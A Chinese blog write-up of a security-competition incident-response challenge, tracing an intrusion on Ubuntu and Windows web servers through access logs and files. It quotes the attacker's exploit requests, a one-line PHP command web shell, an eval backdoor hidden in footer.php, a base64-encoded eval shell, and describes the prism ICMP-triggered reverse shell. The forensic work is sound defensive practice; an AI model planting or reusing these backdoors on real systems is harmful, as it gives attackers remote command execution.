信安大赛-应急响应

WTT00112025-01-17 16:02

Ubuntu应急响应

|----|--------------------------------------|
| 1 | 提交攻击者的IP地址 |
| 2 | 识别攻击者使用的操作系统 |
| 3 | 找出攻击者资产收集所使用的平台 |
| 4 | 提交攻击者目录扫描所使用的工具名称 |
| 5 | 提交攻击者首次攻击成功的时间,格式:DD /MM/YY:HH:MM:SS |
| 6 | 找到攻击者写入的恶意后门文件,提交文件名(完整路径)和后门密码 |
| 7 | 找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径) |
| 8 | 识别系统中存在的恶意程序进程,提交进程名 |
| 9 | 找到文件系统中的恶意程序文件并提交文件名(完整路径) |
| 10 | 简要描述该恶意文件的行为 |

root

1234546

1.提交攻击者的IP地址

一直找日志

是这个

复制代码 
more access.log.1

从192.168.1.5到192.168.1.7就不一样了猜测攻击者是192.168.1.7

复制代码 
192.168.1.5 - - [24/Apr/2022:15:11:48 +0000] "GET /data/captcha/ckstr.php HTTP/1.1" 200 1499 "http://192.168.1.3/message.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"::1 - - [24/Apr/2022:15:11:55 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) (internal dummy connection)"
192.168.1.7 - - [24/Apr/2022:15:14:32 +0000] "GET / HTTP/1.1" 408 482 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.1.7 - - [24/Apr/2022:15:14:52 +0000] "GET /favicon.ico HTTP/1.1" 200 39411 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.1.7 - - [24/Apr/2022:15:15:20 +0000] "GET / HTTP/1.1" 200 3663 "https://www.shodan.io/search?query=php" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.1.7 - - [24/Apr/2022:15:15:20 +0000] "GET /templates/default/style/webstyle.css HTTP/1.1" 200 6599 "http://192.168.1.3/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"

192.168.1.7

2.识别攻击者使用的操作系统
复制代码 
192.168.1.7 - - [24/Apr/2022:15:15:20 +0000] "GET /templates/default/style/webstyle.css HTTP/1.1" 200 6599 "http://192.168.1.3/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"

Linux x86_64

3.找出攻击者资产收集所使用的平台

shodan.io

日志中找到

shodan.io

4.提交攻击者目录扫描所使用的工具名称
复制代码 
192.168.1.7 - - [24/Apr/2022:15:17:45 +0000] "GET /rHdA9nYoF68B HTTP/1.1" 404 43
4 "-" "DIRSEARCH"

DIRSEARCH

5.提交攻击者首次攻击成功的时间,格式:DD /MM/YY:HH:MM:SS
复制代码 
192.168.1.7 - - [24/Apr/2022:15:25:53 +0000] "GET /shoppingcart.php?a=addshopinggcart&goodsid=1&buynum=2&goodsattr=as%26time=999999999999999999%26uid=/../../../pproc/self/cwd/1.php%26a=1 HTTP/1.1" 200 425 "-" "python-requests/2.23.0"
192.168.1.7 - - [24/Apr/2022:15:25:53 +0000] "POST //data/avatar/upload.php?a=upploadavatar&input=2690b1IhecCIpeAK%2BnPLfbnP3AF%2F9TwHSnAxI%2BAfZ%2BC0xIaO33AMyGeeGhpEIO2WxXowgLJ%2FFbPKzhcd1x4Xlwdbs1Pjg5V6Yy2MSj1yzlbw6eHXc6Mu%2FZ5BSbVUolg2kh400WeVCGgHRYc4Zu8X4VONadz5WOuerWpdPmDRtAjQb8lZjMVQDSPgY&_SERVER%5BHTTP_USER_AGENT%55D%5B%5D=1 HTTP/1.1" 200 296 "-" "python-requests/2.23.0"

这两条日志

先是上传了一个php文件

然后命令执行了

24/Apr/2022:15:25:53

24/04/22:15:25:53

6.找到攻击者写入的恶意后门文件,提交文件名(完整路径)和后门密码

根据上题日志

上传了一个1.php

复制代码 
find / -name 1.php
复制代码 
root@webserver:/# cd /var/www/html/data/avatar
root@webserver:/var/www/html/data/avatar# ls
1.php  images  index.php  lib  upload.php
root@webserver:/var/www/html/data/avatar# cat 1.php
<?php system($_GET[2022]);?>
        #define width 20
        #define height 20

文件名:1.php

后门密码:2022

7.找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径)
复制代码 
root@webserver:/var/www/html# cat footer.php 
<!-- weblink-->

<div class="weblink">
        <?php
        $dosql->Execute("SELECT * FROM `#@__weblink` WHERE classid=1 AND checkinfo=true ORDER BY orderid,id DESC");
        while($row = $dosql->GetArray())
        {
        ?>
        <a href="<?php echo $row['linkurl']; ?>" target="_blank"><?php echo $row['webname']; ?></a>
        <?php
        }
        ?>
</div>
<!-- /weblink-->
<!-- footer-->
<div class="footer"><?php echo $cfg_copyright ?><br />网站采用 <a href="http://phpmywind.com" target="_blank">PHPMyWind</a> 核心</div>
<!-- /footer-->
<?php
@eval($_POST['catchmeifyoucan'])
echo GetQQ();

//将流量统计代码放在页面最底部
$cfg_countcode;

?>

一个后门

/var/www/html/footer.php

8.识别系统中存在的恶意程序进程,提交进程名
复制代码 
ps aux
复制代码 
cat prism
9.找到文件系统中的恶意程序文件并提交文件名(完整路径)

根据上题

/root/.mal/prism

10.简要描述该恶意文件的行为

根据上上题

等待来自攻击者的ICMP数据包,该数据包包含要回连的主机、端口和密钥,被激活后将/bin/sh回连到主机指定端口,供攻击者执行命令

windows服务器应急响应

首先环境是这样的,比linux应急响应好多了,有图形界面...

1.请提交攻击者攻击成功的第一时间,格式:YY:MM:DD hh:mm:ss

在phpstudy目录下搜索日志文件

省赛用的是别人的工具,只能肉眼观察喽,个人习惯于010,可惜省赛有可能不提供...

这条是登录了管理员账号

29/Apr/2023:22:45:23

23:04:29 10:45:23

2.请提交攻击者的浏览器版本

Firefox/110.0

3.请提交攻击者目录扫描所使用的工具名称

Fuzz Faster U Fool

4.找到攻击者写入的恶意后门文件,提交文件名(完整路径)

C:\phpstudy_pro\WWW\.x.php

5.找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径)

PD9waHAgQGV2YWwoJF9SRVFVRVNUWyd4J10pOyA/Pg==

C:\phpstudy_pro\WWW\usr\themes\default\post.php

6.请提交内存中可疑进程的PID

在资源监视器里发现有外联

1200

7.请提交攻击者执行过几次修改文件访问权限的命令

2

8.请指出可疑进程采用的自动启动的方式

策略组->计算机配置->Windows设置->脚本(启动/关机)->启动->属性

发现自启动了一个bat脚本

相关推荐
正经教主11 分钟前
【问题】解决docker的方式安装n8n,找不到docker.n8n.io/n8nio/n8n:latest镜像的问题
运维·docker·容器·n8n
刘婉晴14 分钟前
【信息安全工程师备考笔记】第三章 密码学基本理论
笔记·安全·密码学
老六ip加速器28 分钟前
国内ip地址怎么改?详细教程
网络·tcp/ip·智能路由器
唯独失去了从容39 分钟前
WebRTC服务器Coturn服务器中的通信协议
运维·服务器·webrtc
欧先生^_^1 小时前
OSPF网络协议
网络·网络协议·智能路由器
瞎胡侃1 小时前
Spark读取Apollo配置
大数据·spark·apollo
悻运1 小时前
如何配置Spark
大数据·分布式·spark
懒惰的橘猫2 小时前
Spark集群搭建之Yarn模式
大数据·分布式·spark
光而不耀@lgy2 小时前
C++初登门槛
linux·开发语言·网络·c++·后端
joker_zsl2 小时前
docker的安装和简单使用(ubuntu环境)
运维·docker·容器
热门推荐
01KGG转MP3工具|非KGM文件|解密音频02从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑03我决定放弃搞 Java 了04Coze扣子平台完整体验和实践(附国内和国际版对比)05YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】06DeepSeek各版本说明与优缺点分析07YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU08苍穹外卖面试总结09yolov8,yolo11,yolo12 服务器训练到部署全流程 笔记10yolov8实战第五天——yolov8+ffmpg实时视频流检测并进行实时推流——(推流,保姆教学)